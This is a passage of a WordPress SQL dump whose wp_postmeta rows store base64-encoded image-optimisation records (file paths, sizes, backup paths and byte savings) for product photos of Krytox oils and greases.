XC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MzE3LCJpZCI6MTY2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjczMTksImlkIjoxNjY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzMyMSwiaWQiOjE2NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MzI0LCJpZCI6MTY2NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzMyNiwiaWQiOjE2NjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjczMjksImlkIjoxNjY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MzMxLCJpZCI6MTY2NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29342, 1663, 'wpfc_optimisation_reduction', '11380'); 
INSERT INTO `wp_postmeta` VALUES (29343, 1663, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS5qcGciLCJ3aWR0aCI6NTEwNywiaGVpZ2h0IjozNjAwLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY3MzM2LCJpZCI6IjE2NjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTQ4LCJ0aW1lIjoxNDgzNTY3MzM5LCJpZCI6MTY2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS04MDB4NTY0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTY0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTgwMHg1NjQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtODAweDU2NC5qcGciLCJyZWR1Y3Rpb24iOjEyMjksInRpbWUiOjE0ODM1NjczNDMsImlkIjoxNjYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTc2OHg1NDEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NDEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtNzY4eDU0MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS03Njh4NTQxLmpwZyIsInJlZHVjdGlvbiI6MTE5OCwidGltZSI6MTQ4MzU2NzM0NywiaWQiOjE2NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMTYwMHgxMTI4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjExMjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMTYwMHgxMTI4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTE2MDB4MTEyOC5qcGciLCJyZWR1Y3Rpb24iOjQ2NjMsInRpbWUiOjE0ODM1NjczNTIsImlkIjoxNjYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDg1LCJ0aW1lIjoxNDgzNTY3MzU1LCJpZCI6MTY2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyMiwidGltZSI6MTQ4MzU2NzM1OCwiaWQiOjE2NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MzcsInRpbWUiOjE0ODM1NjczNjIsImlkIjoxNjYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODk1LCJ0aW1lIjoxNDgzNTY3MzY3LCJpZCI6MTY2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDE3LCJ0aW1lIjoxNDgzNTY3MzcxLCJpZCI6MTY2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTIzLCJ0aW1lIjoxNDgzNTY3Mzc0LCJpZCI6MTY2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMFhOLWtyeXRveC1vaWwtZ3JlYXNlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEwWE4ta3J5dG94LW9pbC1ncmVhc2UtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTBYTi1rcnl0b3gtb2lsLWdyZWFzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTYzLCJ0aW1lIjoxNDgzNTY3Mzc4LCJpZCI6MTY2M31d'); 
INSERT INTO `wp_postmeta` VALUES (29344, 1661, 'wpfc_optimisation_reduction', '2994385'); 
INSERT INTO `wp_postmeta` VALUES (29345, 1661, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3guanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjAwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3guanBnIiwicmVkdWN0aW9uIjoyOTk0Mzc0LCJ0aW1lIjoxNDgzNTY3MzkwLCJpZCI6IjE2NjEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzM5MywiaWQiOjE2NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3Mzk2LCJpZCI6MTY2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjczOTksImlkIjoxNjYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDAzLCJpZCI6MTY2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0MDUsImlkIjoxNjYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFw